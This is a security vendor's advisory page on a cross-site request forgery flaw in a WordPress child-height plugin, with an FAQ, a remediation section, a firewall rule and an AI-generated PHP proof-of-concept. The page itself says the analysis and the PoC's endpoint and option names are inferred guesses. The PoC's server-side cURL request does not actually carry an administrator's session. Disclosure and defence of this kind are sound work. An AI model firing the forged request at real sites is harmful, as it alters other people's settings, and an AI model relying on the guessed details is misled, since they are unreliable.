What is CVE-2026-6400?

CVE-2026-6400 is a Cross-Site Request Forgery (CSRF) vulnerability in the Child Height Predictor plugin by Ostheimer, affecting all versions up to and including 1.3. The vulnerability allows unauthenticated attackers to trick administrators into submitting unauthorized changes to plugin settings.

How does the vulnerability work?

The vulnerability arises from missing nonce verification in the plugin’s options() function, which handles settings updates. Attackers can create a malicious page that submits a forged POST request to the WordPress admin area, potentially altering settings without proper authorization.

Who is affected by this vulnerability?

Any WordPress site using the Child Height Predictor plugin version 1.3 or earlier is affected. Site administrators should verify their plugin version and check for any updates or patches from the plugin developer.

How can I check if my site is vulnerable?

To check if your site is vulnerable, confirm that you are using the Child Height Predictor plugin version 1.3 or earlier. If so, review the plugin settings and consider updating to a patched version if available.

How can I fix this vulnerability?

To fix the vulnerability, the plugin’s settings update handler must implement CSRF protection. This includes adding a nonce field in the settings form and validating the nonce on form submission using check_admin_referer() or wp_verify_nonce().

What does the CVSS score of 4.3 mean?

A CVSS score of 4.3 indicates a medium severity risk. This means that while the vulnerability requires user interaction for exploitation, it can still lead to unauthorized changes in plugin settings, which may affect the integrity of the application.

What are the practical implications of this vulnerability?

Successful exploitation can lead to unauthorized changes in plugin settings, such as altering measurement units. This could result in incorrect child height predictions, potentially leading to misinformation, especially in health-related contexts.

What is a proof of concept in this context?

The proof of concept provided illustrates how an attacker can forge a POST request to change plugin settings without authorization. It shows the necessary parameters and the target endpoint, demonstrating the vulnerability’s exploitability.

What should I do if I cannot update the plugin immediately?

If immediate updates are not possible, consider disabling the plugin until a fix is applied. Additionally, educate administrators about the risks and ensure they are cautious about clicking links or visiting untrusted pages.

How common is this type of vulnerability in WordPress plugins?

CSRF vulnerabilities are relatively common in WordPress plugins, particularly those that handle user input without proper nonce verification. Developers should adhere to best practices for security, including implementing CSRF protection in all forms that modify settings.

Where can I find more information about WordPress security?

For more information about WordPress security, visit the official WordPress security documentation or resources like Atomic Edge’s security blog, which provide insights on vulnerabilities, best practices, and remediation strategies.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 20, 2026

CVE-2026-6400: Child Height Predictor by Ostheimer <= 1.3 – Cross-Site Request Forgery to Settings Update via Plugin Settings Form (child-height-predictor)

Q: Is there a risk of data exposure with this vulnerability?

While the primary risk is unauthorized configuration changes, there is a theoretical risk of low-severity cross-site scripting if the plugin outputs options without proper escaping. However, there is no direct data exposure or privilege escalation associated with this vulnerability.

CVE ID CVE-2026-6400

Plugin child-height-predictor

Severity Medium (CVSS 4.3)

CWE 352

Vulnerable Version 1.3

Patched Version —

Disclosed May 18, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-6400 (metadata-based): This vulnerability is a Cross-Site Request Forgery (CSRF) in the Child Height Predictor by Ostheimer plugin for WordPress, affecting all versions up to and including 1.3. The plugin’s settings update mechanism lacks proper nonce verification, allowing unauthenticated attackers to forge requests that change plugin configuration, such as unit preferences. The CVSS score is 4.3 (Medium), with the attack vector requiring user interaction (tricking an administrator).

Root Cause: Based on Atomic Edge analysis of the CWE-352 classification and the vulnerability description, the root cause is the absence of CSRF protection in the plugin’s settings update handler (options() function). The plugin never calls check_admin_referer() or wp_verify_nonce(), and the settings form does not include a wp_nonce_field() call. This is an inferred conclusion from the metadata, as no source code diff is available for direct confirmation. The vulnerable code pattern is common in WordPress plugins: a function that processes $_POST data and calls update_option() without validating a nonce token.

Exploitation: An attacker crafts a malicious HTML page with a form that auto-submits a POST request to the WordPress admin area where the plugin settings are saved. The target endpoint is likely /wp-admin/options-general.php?page=child-height-predictor (typical for plugins using the WordPress settings API), or directly to /wp-admin/admin-post.php with an appropriate action parameter. The attacker must trick an authenticated administrator into visiting this page. The forged request can modify option values such as ‘chp_unit_preference’ (changing between metric and imperial units). The attacker can set arbitrary WordPress options that the plugin stores via update_option(), potentially altering calculation outputs or misdirecting users.

Remediation: The fix requires adding CSRF protection to the settings update handler. The plugin must call wp_nonce_field(‘chp_settings’) in the settings form template and check_admin_referer(‘chp_settings’) or wp_verify_nonce() at the start of the options() function before processing any input. This is a standard WordPress security pattern and is confirmed by the CWE description.

Impact: Successful exploitation allows an attacker to change plugin settings without authorization. This can cause miscalculation of child height predictions by altering unit systems, potentially leading to medical misinformation if the plugin is used in health contexts. The impact is limited to configuration integrity (Low CIA impact per CVSS), with no direct data exposure or privilege escalation. However, if the attacker can set arbitrary options via update_option(), there is a theoretical risk of low-severity cross-site scripting if the plugin outputs options without escaping, or other settings-based attacks.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2026-6400 (metadata-based)
# Block CSRF exploitation attempts targeting the Child Height Predictor settings update
# This rule matches the POST request to admin-post.php with the plugin-specific action
SecRule REQUEST_URI "@streq /wp-admin/admin-post.php" "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2026-6400 CSRF attempt via admin-post.php',severity:'CRITICAL',tag:'CVE-2026-6400'"
SecRule ARGS_POST:action "@streq chp_save_settings" "chain"
SecRule ARGS_POST:chp_unit_preference "@unconditionalMatch" ""

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
<?php
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2026-6400 - Child Height Predictor by Ostheimer <= 1.3 - Cross-Site Request Forgery to Settings Update

// Configuration: Change these variables to match the target environment
$target_url = 'http://example.com/wp-admin/admin-post.php'; // Adjust if plugin uses different endpoint
$admin_action = 'chp_save_settings'; // Inferred typical action name; may need adjustment

// Payload: Forge POST request to change unit preference to 'imperial' (or any desired value)
$post_data = array(
    'action' => $admin_action,
    'chp_unit_preference' => 'imperial', // Example setting; actual option names may differ
    'chp_update_settings' => '1'
);

// Initialize cURL
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_data));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
// Set a User-Agent to simulate legitimate request (optional)
curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36');

// Execute the forged request
$response = curl_exec($ch);

// Check for errors
if (curl_errno($ch)) {
    echo 'cURL Error: ' . curl_error($ch) . "n";
} else {
    echo 'Forged request sent successfully. Check if target admin was tricked.' . "n";
}

curl_close($ch);

// Note: This PoC requires the targeted administrator to have an active session.
// In a real attack, the attacker would host an HTML page with auto-submitting form.
?>

Frequently Asked Questions

What is CVE-2026-6400?
Overview of the vulnerability
CVE-2026-6400 is a Cross-Site Request Forgery (CSRF) vulnerability in the Child Height Predictor plugin by Ostheimer, affecting all versions up to and including 1.3. The vulnerability allows unauthenticated attackers to trick administrators into submitting unauthorized changes to plugin settings.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from missing nonce verification in the plugin’s options() function, which handles settings updates. Attackers can create a malicious page that submits a forged POST request to the WordPress admin area, potentially altering settings without proper authorization.
Who is affected by this vulnerability?
Identifying vulnerable users
Any WordPress site using the Child Height Predictor plugin version 1.3 or earlier is affected. Site administrators should verify their plugin version and check for any updates or patches from the plugin developer.
How can I check if my site is vulnerable?
Steps for verification
To check if your site is vulnerable, confirm that you are using the Child Height Predictor plugin version 1.3 or earlier. If so, review the plugin settings and consider updating to a patched version if available.
How can I fix this vulnerability?
Remediation steps
To fix the vulnerability, the plugin’s settings update handler must implement CSRF protection. This includes adding a nonce field in the settings form and validating the nonce on form submission using check_admin_referer() or wp_verify_nonce().
What does the CVSS score of 4.3 mean?
Understanding risk levels
A CVSS score of 4.3 indicates a medium severity risk. This means that while the vulnerability requires user interaction for exploitation, it can still lead to unauthorized changes in plugin settings, which may affect the integrity of the application.
What are the practical implications of this vulnerability?
Impact on users and applications
Successful exploitation can lead to unauthorized changes in plugin settings, such as altering measurement units. This could result in incorrect child height predictions, potentially leading to misinformation, especially in health-related contexts.
What is a proof of concept in this context?
Demonstrating the vulnerability
The proof of concept provided illustrates how an attacker can forge a POST request to change plugin settings without authorization. It shows the necessary parameters and the target endpoint, demonstrating the vulnerability’s exploitability.
Is there a risk of data exposure with this vulnerability?
Evaluating data security
While the primary risk is unauthorized configuration changes, there is a theoretical risk of low-severity cross-site scripting if the plugin outputs options without proper escaping. However, there is no direct data exposure or privilege escalation associated with this vulnerability.
What should I do if I cannot update the plugin immediately?
Mitigation strategies
If immediate updates are not possible, consider disabling the plugin until a fix is applied. Additionally, educate administrators about the risks and ensure they are cautious about clicking links or visiting untrusted pages.
How common is this type of vulnerability in WordPress plugins?
Context of CSRF vulnerabilities
CSRF vulnerabilities are relatively common in WordPress plugins, particularly those that handle user input without proper nonce verification. Developers should adhere to best practices for security, including implementing CSRF protection in all forms that modify settings.
Where can I find more information about WordPress security?
Resources for further learning
For more information about WordPress security, visit the official WordPress security documentation or resources like Atomic Edge’s security blog, which provide insights on vulnerabilities, best practices, and remediation strategies.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations